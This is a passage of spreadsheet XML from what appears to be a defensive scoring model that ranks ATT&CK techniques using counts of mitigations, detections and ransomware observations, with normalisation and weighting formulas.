        <v>0.1</v>
      </c>
      <c r="K59">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L59">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M59" s="44">
        <v>2.1470699999999999E-2</v>
      </c>
      <c r="N59" s="51">
        <v>0</v>
      </c>
      <c r="O59" s="51">
        <v>3</v>
      </c>
      <c r="P59" s="51">
        <v>3</v>
      </c>
      <c r="Q59" s="51">
        <v>0</v>
      </c>
      <c r="R59" s="52" t="s">
        <v>318</v>
      </c>
      <c r="S59" s="51">
        <v>2</v>
      </c>
      <c r="T59" s="52" t="s">
        <v>319</v>
      </c>
      <c r="U59" s="51">
        <v>6</v>
      </c>
      <c r="V59" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190476</v>
      </c>
      <c r="W59">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>8</v>
      </c>
      <c r="X59">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.14545454545454545</v>
      </c>
      <c r="Y59">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.14545454545454545</v>
      </c>
      <c r="Z59">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA59">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB59">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC59" s="29" t="s">
        <v>320</v>
      </c>
      <c r="AD59" s="25" t="str" cm="1">
        <f t="array" ref="AD59">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC59)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE59" s="25">
        <f>IF(AD59="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF59" s="25" t="str" cm="1">
        <f t="array" ref="AF59">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC59)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG59" s="25">
        <f>IF(AF59="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH59" s="25" t="str" cm="1">
        <f t="array" ref="AH59">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC59)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI59" s="25">
        <f>IF(AH59="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ59" s="25" t="str" cm="1">
        <f t="array" ref="AJ59">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC59)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK59" s="25">
        <f>IF(AJ59="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL59" s="25" t="str" cm="1">
        <f t="array" ref="AL59">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC59)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM59" s="25">
        <f>IF(AL59="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN59" s="52">
        <v>1</v>
      </c>
      <c r="AO59" s="51">
        <v>1</v>
      </c>
      <c r="AP59" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.7901675340952372E-2</v>
      </c>
      <c r="AQ59" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11522780669206349</v>
      </c>
      <c r="AR59" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11522780669206349</v>
      </c>
      <c r="AS59" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT59" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU5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60" spans="1:47" ht="48">
      <c r="A60" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16695889518666668</v>
      </c>
      <c r="B60" s="25">
        <f>SUM(H60,M60,V60)*(1+SUM(AE60,AG60,AI60,AK60,AM60))</f>
        <v>0.33625561853333336</v>
      </c>
      <c r="C60" s="25" t="s">
        <v>321</v>
      </c>
      <c r="D60" s="25" t="s">
        <v>322</v>
      </c>
      <c r="E60" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F60" s="51">
        <v>1</v>
      </c>
      <c r="G60" s="51">
        <v>1</v>
      </c>
      <c r="H60" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I60">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J60">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K60">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L60">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M60" s="44">
        <v>1.9490440000000001E-2</v>
      </c>
      <c r="N60" s="51">
        <v>1</v>
      </c>
      <c r="O60" s="51">
        <v>8</v>
      </c>
      <c r="P60" s="51">
        <v>4</v>
      </c>
      <c r="Q60" s="51">
        <v>15</v>
      </c>
      <c r="R60" s="51"/>
      <c r="S60" s="51">
        <v>0</v>
      </c>
      <c r="T60" s="51"/>
      <c r="U60" s="51">
        <v>0</v>
      </c>
      <c r="V60" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W60">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X60">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y60">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z60">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>28</v>
      </c>
      <c r="AA60">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.28000000000000003</v>
      </c>
      <c r="AB60">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.28000000000000003</v>
      </c>
      <c r="AC60" s="29" t="s">
        <v>323</v>
      </c>
      <c r="AD60" s="25" t="str" cm="1">
        <f t="array" ref="AD60">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC60)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE60" s="25">
        <f>IF(AD60="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF60" s="25" t="str" cm="1">
        <f t="array" ref="AF60">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC60)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG60" s="25">
        <f>IF(AF60="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH60" s="25" t="str" cm="1">
        <f t="array" ref="AH60">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC60)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI60" s="25">
        <f>IF(AH60="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ60" s="25" t="str" cm="1">
        <f t="array" ref="AJ60">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC60)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK60" s="25">
        <f>IF(AJ60="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL60" s="25" t="str" cm="1">
        <f t="array" ref="AL60">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC60)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM60" s="25">
        <f>IF(AL60="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN60" s="59">
        <v>4</v>
      </c>
      <c r="AO60" s="51">
        <v>1</v>
      </c>
      <c r="AP60" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16695889518666668</v>
      </c>
      <c r="AQ60" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11208520617777779</v>
      </c>
      <c r="AR60" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11208520617777779</v>
      </c>
      <c r="AS60" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT60" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU6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61" spans="1:47" ht="32.1">
      <c r="A61" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4793724971047619E-2</v>
      </c>
      <c r="B61" s="25">
        <f>SUM(H61,M61,V61)*(1+SUM(AE61,AG61,AI61,AK61,AM61))</f>
        <v>0.21460391637714288</v>
      </c>
      <c r="C61" s="25" t="s">
        <v>324</v>
      </c>
      <c r="D61" s="25" t="s">
        <v>325</v>
      </c>
      <c r="E61" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F61" s="51">
        <v>1</v>
      </c>
      <c r="G61" s="51">
        <v>1</v>
      </c>
      <c r="H61" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I61">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J61">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K61">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L61">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M61" s="44">
        <v>1.8150860000000001E-2</v>
      </c>
      <c r="N61" s="51">
        <v>0</v>
      </c>
      <c r="O61" s="51">
        <v>14</v>
      </c>
      <c r="P61" s="51">
        <v>0</v>
      </c>
      <c r="Q61" s="51">
        <v>1</v>
      </c>
      <c r="R61" s="51"/>
      <c r="S61" s="51">
        <v>0</v>
      </c>
      <c r="T61" s="51"/>
      <c r="U61" s="51">
        <v>0</v>
      </c>
      <c r="V61" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>7.1428571428571425E-2</v>
      </c>
      <c r="W61">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X61">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y61">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z61">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>15</v>
      </c>
      <c r="AA61">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.15</v>
      </c>
      <c r="AB61">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.15</v>
      </c>
      <c r="AC61" s="29" t="s">
        <v>183</v>
      </c>
      <c r="AD61" s="25" t="str" cm="1">
        <f t="array" ref="AD61">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC61)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE61" s="25">
        <f>IF(AD61="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF61" s="25" t="str" cm="1">
        <f t="array" ref="AF61">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC61)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG61" s="25">
        <f>IF(AF61="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH61" s="25" t="str" cm="1">
        <f t="array" ref="AH61">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC61)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI61" s="25">
        <f>IF(AH61="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ61" s="25" t="str" cm="1">
        <f t="array" ref="AJ61">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC61)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK61" s="25">
        <f>IF(AJ61="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL61" s="25" t="str" cm="1">
        <f t="array" ref="AL61">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC61)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM61" s="25">
        <f>IF(AL61="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN61" s="52">
        <v>1</v>
      </c>
      <c r="AO61" s="51">
        <v>1</v>
      </c>
      <c r="AP61" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4793724971047619E-2</v>
      </c>
      <c r="AQ61" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.1534638792380964E-2</v>
      </c>
      <c r="AR61" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.1534638792380964E-2</v>
      </c>
      <c r="AS61" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT61" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU6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62" spans="1:47" ht="63.95">
      <c r="A62" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11942250797333334</v>
      </c>
      <c r="B62" s="25">
        <f>SUM(H62,M62,V62)*(1+SUM(AE62,AG62,AI62,AK62,AM62))</f>
        <v>0.52755841306666673</v>
      </c>
      <c r="C62" s="25" t="s">
        <v>326</v>
      </c>
      <c r="D62" s="25" t="s">
        <v>327</v>
      </c>
      <c r="E62" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F62" s="51">
        <v>1</v>
      </c>
      <c r="G62" s="51">
        <v>1</v>
      </c>
      <c r="H62" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I62">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J62">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K62">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L62">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M62" s="44">
        <v>1.5708079999999999E-2</v>
      </c>
      <c r="N62" s="51">
        <v>2</v>
      </c>
      <c r="O62" s="51">
        <v>7</v>
      </c>
      <c r="P62" s="51">
        <v>0</v>
      </c>
      <c r="Q62" s="51">
        <v>2</v>
      </c>
      <c r="R62" s="52" t="s">
        <v>328</v>
      </c>
      <c r="S62" s="51">
        <v>13</v>
      </c>
      <c r="T62" s="51" t="s">
        <v>329</v>
      </c>
      <c r="U62" s="51">
        <v>11</v>
      </c>
      <c r="V62" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.28095238095238095</v>
      </c>
      <c r="W62">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>24</v>
      </c>
      <c r="X62">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Y62">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Z62">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>11</v>
      </c>
      <c r="AA62">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.11</v>
      </c>
      <c r="AB62">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.11</v>
      </c>
      <c r="AC62" s="29" t="s">
        <v>107</v>
      </c>
      <c r="AD62" s="25" t="str" cm="1">
        <f t="array" ref="AD62">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC62)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE62" s="25">
        <f>IF(AD62="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF62" s="25" t="str" cm="1">
        <f t="array" ref="AF62">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC62)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG62" s="25">
        <f>IF(AF62="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH62" s="25" t="str" cm="1">
        <f t="array" ref="AH62">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC62)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI62" s="25">
        <f>IF(AH62="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ62" s="25" t="str" cm="1">
        <f t="array" ref="AJ62">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC62)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK62" s="25">
        <f>IF(AJ62="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL62" s="25" t="str" cm="1">
        <f t="array" ref="AL62">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC62)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM62" s="25">
        <f>IF(AL62="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN62" s="59">
        <v>2</v>
      </c>
      <c r="AO62" s="51">
        <v>1</v>
      </c>
      <c r="AP62" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11942250797333334</v>
      </c>
      <c r="AQ62" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17585280435555559</v>
      </c>
      <c r="AR62" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17585280435555559</v>
      </c>
      <c r="AS62" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT62" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU6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63" spans="1:47" ht="63.95">
      <c r="A63" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.6176290930000001E-2</v>
      </c>
      <c r="B63" s="25">
        <f>SUM(H63,M63,V63)*(1+SUM(AE63,AG63,AI63,AK63,AM63))</f>
        <v>0.76176290930000001</v>
      </c>
      <c r="C63" s="25" t="s">
        <v>330</v>
      </c>
      <c r="D63" s="25" t="s">
        <v>331</v>
      </c>
      <c r="E63" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F63" s="51">
        <v>3</v>
      </c>
      <c r="G63" s="51">
        <v>3</v>
      </c>
      <c r="H63" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="I63">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J63">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K63">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L63">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M63" s="44">
        <v>1.561121E-2</v>
      </c>
      <c r="N63" s="51">
        <v>0</v>
      </c>
      <c r="O63" s="51">
        <v>0</v>
      </c>
      <c r="P63" s="51">
        <v>2</v>
      </c>
      <c r="Q63" s="51">
        <v>0</v>
      </c>
      <c r="R63" s="52" t="s">
        <v>332</v>
      </c>
      <c r="S63" s="51">
        <v>7</v>
      </c>
      <c r="T63" s="52" t="s">
        <v>333</v>
      </c>
      <c r="U63" s="51">
        <v>19</v>
      </c>
      <c r="V63" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.25714285714285717</v>
      </c>
      <c r="W63">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>26</v>
      </c>
      <c r="X63">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Y63">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Z63">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA63">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB63">
